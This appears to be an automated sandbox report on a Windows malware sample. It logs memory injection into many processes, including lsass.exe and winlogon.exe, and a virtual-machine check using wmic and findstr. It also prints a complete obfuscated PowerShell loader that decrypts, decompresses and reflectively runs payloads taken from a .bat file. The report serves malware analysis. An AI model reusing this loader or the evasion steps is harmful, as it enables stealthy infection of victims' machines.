Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C115C40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BB497C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F46E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F47070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 220557A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE14340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 27C93250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 227C0130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23A44F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F530850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13376160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C115C40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BB497C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 220A9EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 12198470000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
